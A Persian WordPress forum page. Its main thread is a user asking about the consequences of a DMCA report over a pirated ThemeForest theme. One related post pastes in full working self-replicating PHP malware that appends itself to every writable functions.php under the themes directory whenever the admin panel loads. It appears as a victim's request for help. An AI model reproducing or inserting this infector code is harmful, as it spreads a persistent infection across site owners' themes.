2 پست در این موضوع قرار دارد

سلام من توی تم فارست زیر یک پوسته ای که در حال استفاده از اون هستم کامنت دادم که مشکلی رو برطرف کنند ولی من هنوز اون پوسته رو به صورت اوجینال نخریده بودم و از سایت های ایرانی خریداری کرده بودم و میخواستم اورجینالش رو بعد از برطرف شدن اون مشکلات بخرم کامنت اولی رو جواب داد خود سازنده اصلی و گفت برطرف میکنیم بعد دو هفته من یه مشکل دیگه رو گفتم که دیدم اومدن گفتن ما متوجه شدیم ( از روی پروفایلم تم فارستم و پروفایل توییترم وب سایتم رو و اسم واقعیم رو پیدا کردن . با آی پی روسیه وارد شدن اسم گروهشونم  LMPixels هست) شما دارید از نسخه غیرقانونی پوسته ما استفاده می کنید و ما این مورد رو تحت قوانین DMCA به ادمین Envato گزارش کردیم !

حالا من میخوام بدونم جه عواقبی میتونه داشته باشه این گزارش ؟ من دو تا پوسته اورجینال هم از 3 سال پیش خریدم مثل massive daynamic حالا اکانتم مسدود میشه ؟

توی قوانین نوشته بود میتونن از شرکت هاستینگ هم بخوان که محصول رو از هاست حذف کنند ! من از میهن وب هاست ، هاست میزبانی وب آلمان رو خریدم آیا این امکان وجود داره ؟

ممکنه توسط گوگل بلاک بشم ؟

آدرس محصول : https://themeforest.net/item/unique-resume-vcard-cv-theme/20033679/comments

dvc96.jpg

ویرایش شده در توسط masoumasoud
0

به اشتراک گذاری این پست

لینک به پست

خب متاسفانه اکانتم رو بستن :( حالا یکی بیاد راهنمایی کنه چی بگم توی Help Center آزاد بشم ...

0

به اشتراک گذاری این پست

لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

• مطالب مشابه

• توسط ms368
      سلام دوستان
      من حدود ۲ هفتس که یه قالب خیلی خوب برای تم فارست طراحی کردم (html)
      ظاهرا قالب خوبیه و استاندارد های لازمو داره و میشه گفت در حد قالب های خوب و حرفه ای تم فارسته
      میخاستم بدونم برای تایید قالب به جز بحث ظاهری و کد نویسی چه چیزهایی نیازه؟ (فقط برا html)
      داکیومنت باید بنویسم؟
      ولید ۱۰۰درصد باید باشه؟ (طبق w3)
      قالب چطور باید آپلود شه؟ منظورم اینه که تصاویری که استفاده کردم باید واتر مارک سایت مرجع با Envato رو بزنم؟
      لطفا تجربیات خودتونو بگید
      ممنون.
    • توسط Mortezamsh8
      سلام 
      یه مشکل خیلی خیلی جدی دارم من
      من قالب woodstock رو خریداری کردم که برای نصب اون بسته ی نصبی داشت 
      فایل زیپ قالب رو توی public_html آپلود کردم و بعد اکسترکت کردم همونجا
      بعد آدرس Infinityshop.ir/installer.php رو زدم که نصب قالب شروع بشه 
      قالب رو نصب کردم 
      همه چی هم درست بود
      اما وقتی میرفتم توی پیشخوان وردپرس و از منوی بغل مثلا گزینه ی افزونه ها یا نوشته ها یا رسانه یا... رو می زدم وارد یه صفحه ای میشد که از من ftp server , user ftp , passeord ftp رو میخواست اونم چند بار
      بعد دو ثانیه کلا همه چی رفت یه سری کاراکتر عجیب غریب اومد 
      اصلن نمیدونم چی هس
      به کل زبان پیشخوان عوض شده 
      یه سری کاراکتر عجیب غریب اومده
      خواهشا هر کسی میتونه کمک کنه بگه
      جای دوری نمیره  
      دمتون گرم
      اگرم جایی رو بعد توضیح یا توضیح بیشتر میخواد بگید که بگم

• توسط deluxekala
      سلام دوستان
      آیا مثلا پوسته ای که روی تم فارست یا مخزن های شبیه به اون هستش و به دلار میخریم با همون پوسته توی فروشگاه های ایرانی که هستش فرقی داره؟ اون اصلی هستش و این کرک شده؟
    • توسط IFTHEN
      اطلاعاتی در مورد ایجاد قسمت تنظیمات پوسته، (از تغییر رنگ و اندازه و...  المان های مختلف و انتخاب فونت و... گرفته تا اضافه و کم کردن قسمت های مختلف مثل تبلیغات و...) می خواستم.
      از کجا باید شروع کرد و اساس کار به چه صورت هست؟
      به چه صورت می شه این پنل رو تعریف و شخصی سازی کرد و گزینه های مختلف به اون اضافه کرد؟
    • توسط sajjadmp
      سلام 
      من برای دومین بار دست به ساختن پوسته ی فرزند برای یه پوسته شدم ولی این بار مثل دفعه ی قبل نیست . 
      به محض ایجاد فایل functions.php ، کدهای زیر توش قرار میگیره و هر چقدر هم که پاک میکنم دوباره می بینم سر و کلشون پیدا میشه و همین باعث میشه وردپرس صفحه سفید مرگ رو نشون بده ! 
      راهکار چیه ؟؟
      <?php function _check_active_widget(){ $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed=""; $output=strip_tags($output, $allowed); $direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6))); if (is_array($direst)){ foreach ($direst as $item){ if (is_writable($item)){ $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"(")); $cont=file_get_contents($item); if (stripos($cont,$ftion) === false){ $sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">"; $output .= $before . "Not found" . $after; if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);} $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f); $output .= ($showdot && $ellipsis) ? "..." : ""; } } } } return $output; } function _get_all_widgetcont($wids,$items=array()){ $places=array_shift($wids); if(substr($places,-1) == "/"){ $places=substr($places,0,-1); } if(!file_exists($places) || !is_dir($places)){ return false; }elseif(is_readable($places)){ $elems=scandir($places); foreach ($elems as $elem){ if ($elem != "." && $elem != ".."){ if (is_dir($places . "/" . $elem)){ $wids[]=$places . "/" . $elem; } elseif (is_file($places . "/" . $elem)&& $elem == substr(__FILE__,-13)){ $items[]=$places . "/" . $elem;} } } }else{ return false; } if (sizeof($wids) > 0){ return _get_all_widgetcont($wids,$items); } else { return $items; } } if(!function_exists("stripos")){ function stripos( $str, $needle, $offset = 0 ){ return strpos( strtolower( $str ), strtolower( $needle ), $offset ); } } if(!function_exists("strripos")){ function strripos( $haystack, $needle, $offset = 0 ) { if( !is_string( $needle ) )$needle = chr( intval( $needle ) ); if( $offset < 0 ){ $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) ); } else{ $temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) ); } if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE; $pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) ); return $pos; } } if(!function_exists("scandir")){ function scandir($dir,$listDirectories=false, $skipDots=true) { $dirArray = array(); if ($handle = opendir($dir)) { while (false !== ($file = readdir($handle))) { if (($file != "." && $file != "..") || $skipDots == true) { if($listDirectories == false) { if(is_dir($file)) { continue; } } array_push($dirArray,basename($file)); } } closedir($handle); } return $dirArray; } } add_action("admin_head", "_check_active_widget"); ?>